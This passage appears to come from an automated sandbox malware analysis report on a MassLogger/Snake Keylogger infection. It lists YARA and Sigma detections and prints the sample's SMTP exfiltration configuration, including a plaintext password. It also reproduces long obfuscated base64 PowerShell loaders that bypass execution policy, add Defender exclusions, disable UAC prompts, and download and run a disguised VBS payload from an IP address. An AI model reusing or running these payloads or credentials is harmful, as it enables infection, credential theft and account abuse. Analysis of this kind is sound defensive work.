a3hmZndnbGliZXJiZWl1eGFvZnJnbyA9ICRlbnY6VVNFUk5BTUU7JG1scXhnYmJ4cnl1dnR6c29lY3ZmcWl5enQgPSAnQzpcVXNlcnNcJyArICRxbWRreGZmd2dsaWJlcmJlaXV4YW9mcmdvICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbWxxeGdiYnhyeXV2dHpzb2VjdmZxaXl6dDskdWR5eHI9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRtbHF4Z2JieHJ5dXZ0enNvZWN2ZnFpeXp0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeWRhIGluICR1ZHl4cikgewlpZiAoJHlkYS5TdGFydHNXaXRoKCc6OicpKQl7CQkkZG5xZWw9JHlkYS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kdnRzcHN1bmViZWl0bXlzbHNnamhqemFncz1bc3RyaW5nW11dJGRucWVsLlNwbGl0KCdcJyk7SUVYICckcHpvY2V4eW52bmh0dG9jd3NuenhlY25xcD1pYnB4Z21oanR3a2Jnem4gKHlsY2Z4ZmV0ZHdqc2RpciAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCR2dHNwc3VuZWJlaXRteXNsc2dqaGp6YWdzWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGs9aWJweGdtaGp0d2tiZ3puICh5bGNmeGZldGR3anNkaXIgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkdnRzcHN1bmViZWl0bXlzbHNnamhqemFnc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuICRwem9jZXh5bnZuaHR0b2N3c256eGVjbnFwICRudWxsO3FtYWlubW14bnpheHpocm9od2xoeHBwcm4gJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGsgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "ozge.begindim@pakmeya.com", "Password": "Sapsup1481", "Server": "mail.privateemail.com"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x10dff:$a1: get_encryptedPassword
        • 0x1113b:$a2: get_encryptedUsername
        • 0x10b7a:$a3: get_timePasswordChanged
        • 0x10c9b:$a4: get_passwordField
        • 0x10e15:$a5: set_encryptedPassword
        • 0x127ee:$a7: get_logins
        • 0x1249f:$a8: GetOutlookPasswords
        • 0x1227d:$a9: StartKeylogger
        • 0x1273e:$a10: KeyLoggerEventArgs
        • 0x122da:$a11: KeyLoggerEventArgsEventHandler
        00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          Click to see the 64 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          30.2.powershell.exe.a64805c.3.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            30.2.powershell.exe.a64805c.3.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0xe477:$a1: get_encryptedPassword
            • 0xe7b3:$a2: get_encryptedUsername
            • 0xe1f2:$a3: get_timePasswordChanged
            • 0xe313:$a4: get_passwordField
            • 0xe48d:$a5: set_encryptedPassword
            • 0xfe66:$a7: get_logins
            • 0xfb17:$a8: GetOutlookPasswords
            • 0xf8f5:$a9: StartKeylogger
            • 0xfdb6:$a10: KeyLoggerEventArgs
            • 0xf952:$a11: KeyLoggerEventArgsEventHandler
            79.2.powershell.exe.5a119c0.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
              79.2.powershell.exe.5a119c0.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                79.2.powershell.exe.5a119c0.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  Click to see the 101 entries

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi32_1276.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0x87:$b2: ::FromBase64String(
                  • 0x6d:$b3: ::UTF8.GetString(
                  • 0xd31e:$b3: ::UTF8.GetString(
                  • 0xd7cf:$b3: ::UTF8.GetString(
                  • 0xcfa0:$s1: -join
                  • 0xd357:$s1: -join
                  • 0xd808:$s1: -join
                  • 0xd9a5:$s1: -join
                  • 0xda1b:$s1: -join
                  • 0xe112:$s1: -join
                  • 0x674c:$s4: +=
                  • 0x680e:$s4: +=
                  • 0xaa35:$s4: +=
                  • 0xcb52:$s4: +=
                  • 0xce3c:$s4: +=
                  • 0xcf82:$s4: +=
                  • 0x3beb5:$s4: +=
                  • 0x3bf35:$s4: +=
                  • 0x3bffb:$s4: +=
                  • 0x3c07b:$s4: +=
                  • 0x3c251:$s4: +=
                  amsi32_7628.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0x87:$b2: ::FromBase64String(
                  • 0x6d:$b3: ::UTF8.GetString(
                  • 0x9bb6:$b3: ::UTF8.GetString(
                  • 0xa067:$b3: ::UTF8.GetString(
                  • 0x9838:$s1: -join
                  • 0x9bef:$s1: -join
                  • 0xa0a0:$s1: -join
                  • 0xa23d:$s1: -join
                  • 0xa2b3:$s1: -join
                  • 0xa9aa:$s1: -join
                  • 0x2fe4:$s4: +=
                  • 0x30a6:$s4: +=
                  • 0x72cd:$s4: +=
                  • 0x93ea:$s4: +=
                  • 0x96d4:$s4: +=
                  • 0x981a:$s4: +=
                  • 0x36c3a:$s4: +=
                  • 0x36cba:$s4: +=
                  • 0x36d80:$s4: +=
                  • 0x36e00:$s4: +=
                  • 0x36fd6:$s4: +=
                  amsi32_8000.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0x87:$b2: ::FromBase64String(
                  • 0x6d:$b3: ::UTF8.GetString(
                  • 0x9bb6:$b3: ::UTF8.GetString(
                  • 0xa067:$b3: ::UTF8.GetString(
                  • 0x9838:$s1: -join
                  • 0x9bef:$s1: -join
                  • 0xa0a0:$s1: -join
                  • 0xa23d:$s1: -join
                  • 0xa2b3:$s1: -join
                  • 0xa9aa:$s1: -join
                  • 0x2fe4:$s4: +=
                  • 0x30a6:$s4: +=
                  • 0x72cd:$s4: +=
                  • 0x93ea:$s4: +=
                  • 0x96d4:$s4: +=
                  • 0x981a:$s4: +=
                  • 0x36c3a:$s4: +=
                  • 0x36cba:$s4: +=
                  • 0x36d80:$s4: +=
                  • 0x36e00:$s4: +=
                  • 0x36fd6:$s4: +=
                  amsi32_4696.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0x87:$b2: ::FromBase64String(
                  • 0x6d:$b3: ::UTF8.GetString(
                  • 0x9bb6:$b3: ::UTF8.GetString(
                  • 0xa067:$b3: ::UTF8.GetString(
                  • 0x9838:$s1: -join
                  • 0x9bef:$s1: -join
                  • 0xa0a0:$s1: -join
                  • 0xa23d:$s1: -join
                  • 0xa2b3:$s1: -join
                  • 0xa9aa:$s1: -join
                  • 0x2fe4:$s4: +=
                  • 0x30a6:$s4: +=
                  • 0x72cd:$s4: +=
                  • 0x93ea:$s4: +=
                  • 0x96d4:$s4: +=
                  • 0x981a:$s4: +=
                  • 0x36c3a:$s4: +=
                  • 0x36cba:$s4: +=
                  • 0x36d80:$s4: +=
                  • 0x36e00:$s4: +=
                  • 0x36fd6:$s4: +=
                  amsi32_7892.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0x87:$b2: ::FromBase64String(
                  • 0x6d:$b3: ::UTF8.GetString(
                  • 0x9bb6:$b3: ::UTF8.GetString(
                  • 0xa067:$b3: ::UTF8.GetString(
                  • 0x9838:$s1: -join
                  • 0x9bef:$s1: -join
                  • 0xa0a0:$s1: -join
                  • 0xa23d:$s1: -join
                  • 0xa2b3:$s1: -join
                  • 0xa9aa:$s1: -join
                  • 0x2fe4:$s4: +=
                  • 0x30a6:$s4: +=
                  • 0x72cd:$s4: +=
                  • 0x93ea:$s4: +=
                  • 0x96d4:$s4: +=
                  • 0x981a:$s4: +=
                  • 0x36c3a:$s4: +=
                  • 0x36cba:$s4: +=
                  • 0x36d80:$s4: +=
                  • 0x36e00:$s4: +=
                  • 0x36fd6:$s4: +=
                  Click to see the 4 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRid2p2cGFqcnB1d2R2a2h2ZW90eXZhc2xiPU5ldy1PYmpl
                  Sigma detected: Potentially Suspicious PowerShell Child Processes
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\windowsupdate.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\windowsupdate.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6756, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\windowsupdate.vbS" , ProcessId: 1816, ProcessName: wscript.exe
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRid2p2cGFqcnB1d2R2a2h2ZW90eXZhc2xiPU5ldy1PYmpl
                  Sigma detected: Powerup Write Hijack DLL
                  Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1276, TargetFilename: C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Sigma detected: Suspicious PowerShell Parameter Substring
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XT